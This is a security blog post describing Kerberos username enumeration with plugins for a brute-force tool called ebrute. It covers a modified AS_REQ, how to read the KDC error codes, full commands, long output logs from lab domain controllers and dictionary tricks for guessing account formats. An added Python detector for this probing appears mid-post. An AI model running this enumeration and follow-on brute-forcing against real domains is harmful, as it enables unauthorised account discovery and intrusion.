Tuesday, 6 December 2011


Kerberos Username Validation and Authentication Modules
I thought I would finally do a quick post about my Kerberos enumeration and authentication modules for ebrute. I stumbled across this a few years ago when researching Windows authentication mechanisms. A bit of tweaking allowed for the validation of a user account to be performed without a password guess via a single packet. Eventually I coded it into a usable plugin for ebrute. If you find yourself on a locked-down network where you can't enumerate users via null shares or RID cycling, this might just give you a nice starting point. It is best run over UDP (up to millions of validations per minute), but a TCP validation module is also included. If it is not working, try kerbenumtcp rather than kerbenum as shown in the examples below.

In brief, Windows uses Kerberos extensively so that parties communicating over a non-secure network can prove their identities in a secure manner. The simple attack included in ebrute can be used to validate user accounts on w2k/2k3/2k8 Domain Controllers. The approach taken was:
  • Take a standard AS_REQ
  • Remove the PA_ENC_TIMESTAMP (saves 98 bytes and a password guess)
  • Remove any unnecessary encryption types (saves ~16 bytes)
  • Remove host fields (saves ~30 bytes)
  • Change the client name to the user
  • Change the realm to the domain we are querying
  • Send packet
  • Parse the exceptions
Understanding the exceptions:
  • Invalid domain = KDC_ERR_WRONG_REALM
  • Invalid user = KDC_ERR_C_PRINCIPAL_UNKNOWN
  • Valid user = KDC_ERR_PREAUTH_REQUIRED
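
An added example (not part of the original post or of ebrute): one way a defender could spot this probing from the KDC side, by counting AS-REQs that arrive without pre-authentication and mostly draw KDC_ERR_C_PRINCIPAL_UNKNOWN. The record layout, thresholds, addresses and account names are constructed for illustration; the numeric error codes are those of RFC 4120.

```python
"""Flag sources that probe the KDC for usernames with pre-auth-less AS-REQs."""
from collections import defaultdict, deque
from dataclasses import dataclass, field

# RFC 4120 error codes behind the three replies listed above.
KDC_ERR_C_PRINCIPAL_UNKNOWN = 6   # invalid user
KDC_ERR_PREAUTH_REQUIRED = 25     # valid user
KDC_ERR_WRONG_REALM = 68          # invalid domain
PROBE_REPLIES = {KDC_ERR_C_PRINCIPAL_UNKNOWN, KDC_ERR_PREAUTH_REQUIRED,
                 KDC_ERR_WRONG_REALM}


@dataclass(frozen=True)
class KdcReply:
    """One AS exchange as recorded by a sensor (hypothetical record layout)."""
    ts: float          # seconds since start of capture
    src: str           # client IP address
    cname: str         # client principal name from the AS-REQ
    error_code: int    # KRB-ERROR error-code, 0 for a successful AS-REP
    had_preauth: bool  # True if the AS-REQ carried PA-ENC-TIMESTAMP


@dataclass
class Alert:
    src: str
    triggered_at: float
    probes: int = 0
    exposed: list = field(default_factory=list)  # names the source saw confirmed


def _is_probe(ev):
    # A normal logon also starts without pre-auth, so volume and hit ratio
    # (checked below) are what separate enumeration from ordinary traffic.
    return not ev.had_preauth and ev.error_code in PROBE_REPLIES


def detect_enumeration(events, window=60.0, min_distinct=20,
                       min_unknown_ratio=0.8):
    """Return one Alert per source that, within `window` seconds, asked about
    at least `min_distinct` principals and was mostly told 'unknown'."""
    events = sorted(events, key=lambda e: e.ts)
    recent = defaultdict(deque)   # src -> probes inside the sliding window
    alerts = {}
    for ev in events:
        if not _is_probe(ev):
            continue
        q = recent[ev.src]
        q.append(ev)
        while ev.ts - q[0].ts > window:
            q.popleft()
        distinct = {e.cname.lower() for e in q}
        unknown = sum(e.error_code == KDC_ERR_C_PRINCIPAL_UNKNOWN for e in q)
        if (ev.src not in alerts and len(distinct) >= min_distinct
                and unknown / len(q) >= min_unknown_ratio):
            alerts[ev.src] = Alert(src=ev.src, triggered_at=ev.ts)
    # Second pass: for each flagged source, total its probes and list the
    # accounts it now knows exist, so those can be watched for password guessing.
    for ev in events:
        alert = alerts.get(ev.src)
        if alert is None or not _is_probe(ev):
            continue
        alert.probes += 1
        name = ev.cname.lower()
        if ev.error_code == KDC_ERR_PREAUTH_REQUIRED and name not in alert.exposed:
            alert.exposed.append(name)
    for alert in alerts.values():
        alert.exposed.sort()
    return sorted(alerts.values(), key=lambda a: a.triggered_at)


def sample_events():
    """Constructed records: two ordinary clients and one enumerating host."""
    ev = []
    # Workstation: two real logons (probe reply, then pre-auth) and one typo.
    for ts, user in ((10.0, "alice"), (50.0, "bob")):
        ev.append(KdcReply(ts, "192.0.2.10", user, KDC_ERR_PREAUTH_REQUIRED, False))
        ev.append(KdcReply(ts + 0.1, "192.0.2.10", user, 0, True))
    ev.append(KdcReply(70.0, "192.0.2.10", "alcie", KDC_ERR_C_PRINCIPAL_UNKNOWN, False))
    # Shared terminal server: many distinct users, but all of them exist.
    for i in range(25):
        ev.append(KdcReply(200.0 + 2 * i, "192.0.2.20", f"emp{i:02d}",
                           KDC_ERR_PREAUTH_REQUIRED, False))
    # Enumerating host: 40 names in two seconds, only two of them valid.
    names = [f"cand{i:02d}" for i in range(40)]
    names[5], names[30] = "administrator", "svc-mssql"
    for i, name in enumerate(names):
        code = (KDC_ERR_PREAUTH_REQUIRED if name in ("administrator", "svc-mssql")
                else KDC_ERR_C_PRINCIPAL_UNKNOWN)
        ev.append(KdcReply(100.0 + 0.05 * i, "192.0.2.50", name, code, False))
    return ev


if __name__ == "__main__":
    for a in detect_enumeration(sample_events()):
        print(f"{a.src}: {a.probes} probes, confirmed accounts: {a.exposed}")
```

The unknown-principal ratio is what keeps the shared terminal server in the sample from being flagged: it asks about many principals, but every one of them exists.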

Let's look at this in action:

C:\tools\dev\br>ebrute
ebrute v0.76 - Edward Torkington
Usage: ebrute.exe -r [plugin] [options] [-u user|-U userfile] [-p pass|-P passfile] [-h host/hostrange|-H hostfile]
  -u    Username (, separated)
  -U    File containing usernames
  -up   Username prefix
  -us   Username suffix
  -uml  Username min length
  -uxl  Username max length
  -p    Password (, separated)
  -P    File containing passwords
  -pp   Password prefix
  -ps   Password suffix
  -pml  Password min length
  -pxl  Password max length
  -h    Host or range (nmap style)
  -H    File containing hosts
  -s    Connect via SSL
  -pn   Port number if not default
  -c    File, colon separated 'login:pass' format, instead of -U/-P options
  -R    File, with restore information saved via F12
  -j    Joey check
  -n    Null/blank check
  -S    Shared passwords optimisation
  -t    Number of threads [1].
  -d    Check all passwords for each user (default removes user after success)
  -un   Always perform uniqueness checks (default <5000 items otherwise slow startup...)
  -df   Disable the user filter (ignores guest, support, kerberos, IIS accounts etc...)
  -a    Disable host connectivity checks
  -l    File to output log to
  -sr   Max retries for scanner to determine if the service is alive [3]
  -sr   Max timeout in ms for scanner to determine if the service is alive [500]
  -jp   Just print out the attempts to be made
  -v    Verbose
  -vv   Very Verbose
  -vvv  Very Very Verbose
  -e    Extra parameters to pass to plugin
  -de   Forced delay between tasks (ms)
  -r    plugin - see below
  -rr   view detailed plugin help


finger ftp kerbauth kerbenum kerbenumtcp ldap lw mssql
mssqlodbc mssqlole mssqlmanaged mysql pop3 postgres process smbrawlmv2sh
smbrawlmv2mh smbrawntlmv2mh smbapilm smbapintlm smbapintlmv2 smtplogin smtpcram smtpntlm
smtpntlmbasic snmp ssh sshalt tcpfuzzerrandom tkpt tkptrandom tftp
udpfuzzerrandom vmware vnc wmi wwwbasic wwwdigest wwwntlm wwwntlmv2


  Keys during tasks
        v to increase debug level
        b to decrease debug level
        + to increase active threads
        - to decrease active threads
        p to pause/resume current job
        s to show authentication successes so far
        d to delete an IP address from the list
        F12 to save current progress, resume with parameter -R.
        Control + c to quit nicely (hold down to force!)


ERROR: No hosts specified.


C:\tools\dev\br>ebrute  -r kerbenum -P c:\tools\wl\std.txt -h 192.168.8.23 -e win2k3r2domain -t 32
ebrute v0.76 - Edward Torkington
Loading passes...
Parsing passes...
Username not specified (normal behavior for some plugins - lets do joey checks)
Added:    28,881 user(s), 0 password(s), 1 host(s),  + joeycheck 28,881 tasks over 32 thread/s.
Starting: 06/12/2011 15:42:15
[5]  HOST: '192.168.8.23' | USER: 'abc' | PASS: 'abc' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[6]  HOST: '192.168.8.23' | USER: 'administrator' | PASS: 'administrator' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[22]  HOST: '192.168.8.23' | USER: 'bob' | PASS: 'bob' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[11]  HOST: '192.168.8.23' | USER: 'guest' | PASS: 'guest' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[5]  HOST: '192.168.8.23' | USER: 'test1' | PASS: 'test1' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[15]  HOST: '192.168.8.23' | USER: 'test2' | PASS: 'test2' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
[4]  HOST: '192.168.8.23' | USER: 'test' | PASS: 'test' | EXTRA: 'win2k3r2domain' | Return code: 'Success' []
Complete: 06/12/2011 15:42:23
Stats:    00:00:08    (~215,491 tasks/minute) (Performed 28,881 / 28,881 tasks)


Summary of Authentication Successes:
HOST: '192.168.8.23' | USER: 'abc' | PASS: 'abc' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'administrator' | PASS: 'administrator' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'bob' | PASS: 'bob' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'guest' | PASS: 'guest' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'test1' | PASS: 'test1' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'test2' | PASS: 'test2' | EXTRA: 'win2k3r2domain' | Return code: 'Success'
HOST: '192.168.8.23' | USER: 'test' | PASS: 'test' | EXTRA: 'win2k3r2domain' | Return code: 'Success'




We can see that the summary of authentication successes gives us 7 user accounts to play with. Whilst the user and pass are printed, this is only user validation at this point. We can now use a whole host of tools (including ebrute) to perform a brute force of any services that use these accounts. Further enumeration tricks can be done, for example:
  • Fast enough to do a-z (1 to 4 in length, sometimes even 5)
  • Prefixing admin,adm,admin-,adm-,svc onto account names
  • Performing brute forcing of common names in different formats to guess the user account pattern
Typically, this methodology leads to around 70% of domain accounts being discovered. The first can be performed easily by supplying a dictionary of a-z permutations. The second can be performed easily through ebrute with the password prefix option -pp. An example against a different Windows 2008 domain is shown below:

C:\tools\dev\br>ebrute -r kerbenum -e w2k8r00t -P c:\tools\wl\main.txt -pp svc- -h 192.168.8.88 -t 16
ebrute v0.76 - Edward Torkington
Loading passes...
Parsing passes...
Username not specified (normal behavior for some plugins - lets do joey checks)
Added:    7,921,039 user(s), 0 password(s), 1 host(s),  + joeycheck 7,921,039 tasks over 16 thread/s.
Starting: 06/12/2011 21:42:36
Tasks remaining: 7,915,604    (Performance: ~161,820 tasks/minute, 50 minutes remain)
[2]  HOST: '192.168.8.88' | USER: 'svc-1luvial' | PASS: 'svc-1luvial' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (At
tempt 1/5)]
[1]  HOST: '192.168.8.88' | USER: 'svc-1luvia1' | PASS: 'svc-1luvia1' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (At
tempt 1/5)]
[11]  HOST: '192.168.8.88' | USER: 'svc-49-57584' | PASS: 'svc-49-57584' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads
(Attempt 1/5)]
Tasks remaining: 7,595,408    (Performance: ~355,773 tasks/minute, 22 minutes remain)
[14]  HOST: '192.168.8.88' | USER: 'svc-UREN1' | PASS: 'svc-UREN1' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (Attem
pt 1/5)]
Tasks remaining: 7,235,127    (Performance: ~360,281 tasks/minute, 21 minutes remain)
[8]  HOST: '192.168.8.88' | USER: 'svc-ade1antamiento' | PASS: 'svc-ade1antamiento' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly redu
ce threads (Attempt 1/5)]
Tasks remaining: 6,875,006    (Performance: ~360,121 tasks/minute, 20 minutes remain)
Tasks remaining: 6,511,282    (Performance: ~363,724 tasks/minute, 19 minutes remain)
Tasks remaining: 6,144,904    (Performance: ~366,378 tasks/minute, 18 minutes remain)
Tasks remaining: 5,785,394    (Performance: ~359,510 tasks/minute, 17 minutes remain)
Tasks remaining: 5,428,181    (Performance: ~357,213 tasks/minute, 16 minutes remain)
Tasks remaining: 5,067,123    (Performance: ~361,058 tasks/minute, 15 minutes remain)
Tasks remaining: 4,718,858    (Performance: ~360,274 tasks/minute, 14 minutes remain)
Tasks remaining: 4,352,219    (Performance: ~366,639 tasks/minute, 13 minutes remain)
[12]  HOST: '192.168.8.88' | USER: 'svc-konflikterend' | PASS: 'svc-konflikterend' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduc
e threads (Attempt 1/5)]
[10]  HOST: '192.168.8.88' | USER: 'svc-konflikterende' | PASS: 'svc-konflikterende' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly red
uce threads (Attempt 1/5)]
Tasks remaining: 3,997,140    (Performance: ~361,097 tasks/minute, 12 minutes remain)
Tasks remaining: 3,634,897    (Performance: ~362,243 tasks/minute, 11 minutes remain)
[5]  HOST: '192.168.8.88' | USER: 'svc-mssql' | PASS: 'svc-mssql' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
Tasks remaining: 3,266,697    (Performance: ~368,200 tasks/minute, 10 minutes remain)
Tasks remaining: 2,902,300    (Performance: ~364,397 tasks/minute, 9 minutes remain)
Tasks remaining: 2,540,417    (Performance: ~361,883 tasks/minute, 8 minutes remain)
[1]  HOST: '192.168.8.88' | USER: 'svc-r0ckhair' | PASS: 'svc-r0ckhair' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (
Attempt 1/5)]
[16]  HOST: '192.168.8.88' | USER: 'svc-r0ckham' | PASS: 'svc-r0ckham' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (A
ttempt 1/5)]
[4]  HOST: '192.168.8.88' | USER: 'svc-r0ckham'z' | PASS: 'svc-r0ckham'z' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads
 (Attempt 1/5)]
[13]  HOST: '192.168.8.88' | USER: 'svc-r0ckh@m'$' | PASS: 'svc-r0ckh@m'$' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce thread
s (Attempt 1/5)]
Tasks remaining: 2,180,575    (Performance: ~359,842 tasks/minute, 7 minutes remain)
Tasks remaining: 1,820,347    (Performance: ~360,228 tasks/minute, 6 minutes remain)
Tasks remaining: 1,458,620    (Performance: ~361,727 tasks/minute, 5 minutes remain)
Tasks remaining: 1,097,220    (Performance: ~361,400 tasks/minute, 4 minutes remain)
Tasks remaining: 737,893    (Performance: ~359,327 tasks/minute, 3 minutes remain)
Tasks remaining: 376,757    (Performance: ~361,136 tasks/minute, 2 minutes remain)
[3]  HOST: '192.168.8.88' | USER: 'svc-ycnangup' | PASS: 'svc-ycnangup' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (
Attempt 1/5)]
Tasks remaining: 14,947    (Performance: ~361,810 tasks/minute, 1 minutes remain)
Complete: 06/12/2011 22:04:14
Stats:    00:21:37    (~366,186 tasks/minute) (Performed 7,921,039 / 7,921,039 tasks)


Summary of Authentication Successes:
HOST: '192.168.8.88' | USER: 'svc-mssql' | PASS: 'svc-mssql' | EXTRA: 'w2k8r00t' | Return code: 'Success'

The last can also be performed with a custom dictionary to find out the format. Another tool (which I'll stick on here shortly) helps generate these dictionaries. The dictionary shown below takes the top ~100 common names from the US census and mangles them as follows:
  • FirstnameSurname
  • Firstname.Surname
  • SurnameFirstname
  • Surname.Firstname
  • Firstname_Surname
  • Surname_Firstname
  • Firstname-Surname
  • Surname-Firstname
Truncations are then performed on each of the first names and surnames (e.g. joh.smith, jo.smith and j.smith) to give a dictionary of ~140,000 names. An example of this technique is shown below:


C:\tools\dev\br>ebrute -r kerbenum -e w2k8r00t -P c:\tools\wl\top_names.txt -h 192.168.8.88 -t 32
ebrute v0.76 - Edward Torkington
Loading passes...
Parsing passes...
Username not specified (normal behavior for some plugins - lets do joey checks)
Added:    139,040 user(s), 0 password(s), 1 host(s),  + joeycheck 139,040 tasks over 32 thread/s.
Starting: 06/12/2011 22:07:22
[28]  HOST: '192.168.8.88' | USER: 'smith.john' | PASS: 'smith.john' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[17]  HOST: '192.168.8.88' | USER: 'kelly.michael' | PASS: 'kelly.michael' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
Complete: 06/12/2011 22:07:44
Stats:    00:00:22    (~378,301 tasks/minute) (Performed 139,040 / 139,040 tasks)

Summary of Authentication Successes:
HOST: '192.168.8.88' | USER: 'smith.john' | PASS: 'smith.john' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'kelly.michael' | PASS: 'kelly.michael' | EXTRA: 'w2k8r00t' | Return code: 'Success'

A full dictionary could then be generated and supplied to ebrute, see below:

C:\tools\dev\br>ebrute -r kerbenum -e w2k8r00t -P c:\tools\wl\surname10000.firstname250.txt -h 192.168.8.88 -t 32
ebrute v0.76 - Edward Torkington
Running without admin privileges - warning some SMB plugins are disabled!
Loading passes...
Parsing passes...
Username not specified (normal behavior for some plugins - lets do joey checks)
Added:    2,500,000 user(s), 0 password(s), 1 host(s),  + joeycheck 2,500,000 tasks over 32 thread/s.
Starting: 07/12/2011 11:21:31
[13]  HOST: '192.168.8.88' | USER: 'SMITH.RONNIE' | PASS: 'SMITH.RONNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[24]  HOST: '192.168.8.88' | USER: 'JOHNSON.PHILIP' | PASS: 'JOHNSON.PHILIP' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[29]  HOST: '192.168.8.88' | USER: 'WILLIAMS.HUGH' | PASS: 'WILLIAMS.HUGH' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[25]  HOST: '192.168.8.88' | USER: 'BROWN.STEVEN' | PASS: 'BROWN.STEVEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[13]  HOST: '192.168.8.88' | USER: 'BROWN.DANIEL' | PASS: 'BROWN.DANIEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[32]  HOST: '192.168.8.88' | USER: 'JONES.JAIME' | PASS: 'JONES.JAIME' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[16]  HOST: '192.168.8.88' | USER: 'JONES.KEN' | PASS: 'JONES.KEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[31]  HOST: '192.168.8.88' | USER: 'JONES.BOB' | PASS: 'JONES.BOB' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[27]  HOST: '192.168.8.88' | USER: 'MILLER.PHILIP' | PASS: 'MILLER.PHILIP' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[19]  HOST: '192.168.8.88' | USER: 'DAVIS.FRANCIS' | PASS: 'DAVIS.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[10]  HOST: '192.168.8.88' | USER: 'DAVIS.FRANCIS' | PASS: 'DAVIS.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[14]  HOST: '192.168.8.88' | USER: 'GARCIA.KEVIN' | PASS: 'GARCIA.KEVIN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[9]  HOST: '192.168.8.88' | USER: 'WILSON.JOHN' | PASS: 'WILSON.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[12]  HOST: '192.168.8.88' | USER: 'WILSON.ROBERT' | PASS: 'WILSON.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[20]  HOST: '192.168.8.88' | USER: 'ANDERSON.GARY' | PASS: 'ANDERSON.GARY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'ANDERSON.TIMOTHY' | PASS: 'ANDERSON.TIMOTHY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[32]  HOST: '192.168.8.88' | USER: 'ANDERSON.DEAN' | PASS: 'ANDERSON.DEAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[5]  HOST: '192.168.8.88' | USER: 'LEE.HENRY' | PASS: 'LEE.HENRY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[8]  HOST: '192.168.8.88' | USER: 'CLARK.TONY' | PASS: 'CLARK.TONY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[14]  HOST: '192.168.8.88' | USER: 'CLARK.BRYAN' | PASS: 'CLARK.BRYAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[31]  HOST: '192.168.8.88' | USER: 'ALLEN.RON' | PASS: 'ALLEN.RON' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[18]  HOST: '192.168.8.88' | USER: 'SCOTT.JOHN' | PASS: 'SCOTT.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[6]  HOST: '192.168.8.88' | USER: 'SCOTT.ROBERT' | PASS: 'SCOTT.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[15]  HOST: '192.168.8.88' | USER: 'SCOTT.MICHAEL' | PASS: 'SCOTT.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[19]  HOST: '192.168.8.88' | USER: 'ADAMS.BYRON' | PASS: 'ADAMS.BYRON' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[29]  HOST: '192.168.8.88' | USER: 'ADAMS.JULIAN' | PASS: 'ADAMS.JULIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[13]  HOST: '192.168.8.88' | USER: 'HILL.STUART' | PASS: 'HILL.STUART' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[10]  HOST: '192.168.8.88' | USER: 'HILL.AUSTIN' | PASS: 'HILL.AUSTIN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[26]  HOST: '192.168.8.88' | USER: 'MITCHELL.TODD' | PASS: 'MITCHELL.TODD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[20]  HOST: '192.168.8.88' | USER: 'EVANS.JOHNNY' | PASS: 'EVANS.JOHNNY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[14]  HOST: '192.168.8.88' | USER: 'TURNER.ERIC' | PASS: 'TURNER.ERIC' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[23]  HOST: '192.168.8.88' | USER: 'TURNER.SCOTT' | PASS: 'TURNER.SCOTT' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[30]  HOST: '192.168.8.88' | USER: 'TURNER.RICKY' | PASS: 'TURNER.RICKY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[12]  HOST: '192.168.8.88' | USER: 'EDWARDS.HOWARD' | PASS: 'EDWARDS.HOWARD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[28]  HOST: '192.168.8.88' | USER: 'COOPER.LUIS' | PASS: 'COOPER.LUIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[15]  HOST: '192.168.8.88' | USER: 'COOPER.MIKE' | PASS: 'COOPER.MIKE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[22]  HOST: '192.168.8.88' | USER: 'COOPER.LUIS' | PASS: 'COOPER.LUIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[21]  HOST: '192.168.8.88' | USER: 'COOPER.MIKE' | PASS: 'COOPER.MIKE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[29]  HOST: '192.168.8.88' | USER: 'BAILEY.FRANCIS' | PASS: 'BAILEY.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[30]  HOST: '192.168.8.88' | USER: 'KELLY.MICHAEL' | PASS: 'KELLY.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[22]  HOST: '192.168.8.88' | USER: 'DIAZ.RICARDO' | PASS: 'DIAZ.RICARDO' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[19]  HOST: '192.168.8.88' | USER: 'WOOD.JIM' | PASS: 'WOOD.JIM' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[21]  HOST: '192.168.8.88' | USER: 'BROOKS.ALLEN' | PASS: 'BROOKS.ALLEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[18]  HOST: '192.168.8.88' | USER: 'BROOKS.JOEL' | PASS: 'BROOKS.JOEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[10]  HOST: '192.168.8.88' | USER: 'BROOKS.ALLEN' | PASS: 'BROOKS.ALLEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[14]  HOST: '192.168.8.88' | USER: 'BROOKS.JOEL' | PASS: 'BROOKS.JOEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[14]  HOST: '192.168.8.88' | USER: 'BENNETT.DARYL' | PASS: 'BENNETT.DARYL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[8]  HOST: '192.168.8.88' | USER: 'BENNETT.JEFF' | PASS: 'BENNETT.JEFF' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'GRAY.NORMAN' | PASS: 'GRAY.NORMAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[11]  HOST: '192.168.8.88' | USER: 'ORTIZ.JOHNNIE' | PASS: 'ORTIZ.JOHNNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'HENDERSON.CHAD' | PASS: 'HENDERSON.CHAD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[20]  HOST: '192.168.8.88' | USER: 'KIM.DARYL' | PASS: 'KIM.DARYL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[6]  HOST: '192.168.8.88' | USER: 'FORD.ROSS' | PASS: 'FORD.ROSS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[21]  HOST: '192.168.8.88' | USER: 'WELLS.BRADLEY' | PASS: 'WELLS.BRADLEY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[19]  HOST: '192.168.8.88' | USER: 'WELLS.BRADLEY' | PASS: 'WELLS.BRADLEY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[3]  HOST: '192.168.8.88' | USER: 'SMITH.ROBERT' | PASS: 'SMITH.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads
Attempt 1/5)]
[2]  HOST: '192.168.8.88' | USER: 'SMITH.MICHAEL' | PASS: 'SMITH.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce thread
 (Attempt 1/5)]
[4]  HOST: '192.168.8.88' | USER: 'SMITH.JOHN' | PASS: 'SMITH.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (Att
mpt 1/5)]
[1]  HOST: '192.168.8.88' | USER: 'SMITH.JAMES' | PASS: 'SMITH.JAMES' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (A
tempt 1/5)]
[18]  HOST: '192.168.8.88' | USER: 'TUCKER.FRANCIS' | PASS: 'TUCKER.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[17]  HOST: '192.168.8.88' | USER: 'TUCKER.FRANCIS' | PASS: 'TUCKER.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[28]  HOST: '192.168.8.88' | USER: 'CRAWFORD.KENT' | PASS: 'CRAWFORD.KENT' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'HUNTER.TROY' | PASS: 'HUNTER.TROY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[5]  HOST: '192.168.8.88' | USER: 'HOLMES.FREDDIE' | PASS: 'HOLMES.FREDDIE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[4]  HOST: '192.168.8.88' | USER: 'SMITH.JOHN' | PASS: 'SMITH.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'ROSE.MARCUS' | PASS: 'ROSE.MARCUS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[18]  HOST: '192.168.8.88' | USER: 'MEDINA.JACKIE' | PASS: 'MEDINA.JACKIE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[5]  HOST: '192.168.8.88' | USER: 'PAYNE.JAY' | PASS: 'PAYNE.JAY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[4]  HOST: '192.168.8.88' | USER: 'PAYNE.JAY' | PASS: 'PAYNE.JAY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[22]  HOST: '192.168.8.88' | USER: 'HAWKINS.OSCAR' | PASS: 'HAWKINS.OSCAR' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'HAWKINS.OSCAR' | PASS: 'HAWKINS.OSCAR' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[12]  HOST: '192.168.8.88' | USER: 'CUNNINGHAM.RONNIE' | PASS: 'CUNNINGHAM.RONNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[3]  HOST: '192.168.8.88' | USER: 'ANDREWS.ROBERT' | PASS: 'ANDREWS.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[32]  HOST: '192.168.8.88' | USER: 'ANDREWS.MICHAEL' | PASS: 'ANDREWS.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[23]  HOST: '192.168.8.88' | USER: 'ANDREWS.DAVID' | PASS: 'ANDREWS.DAVID' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
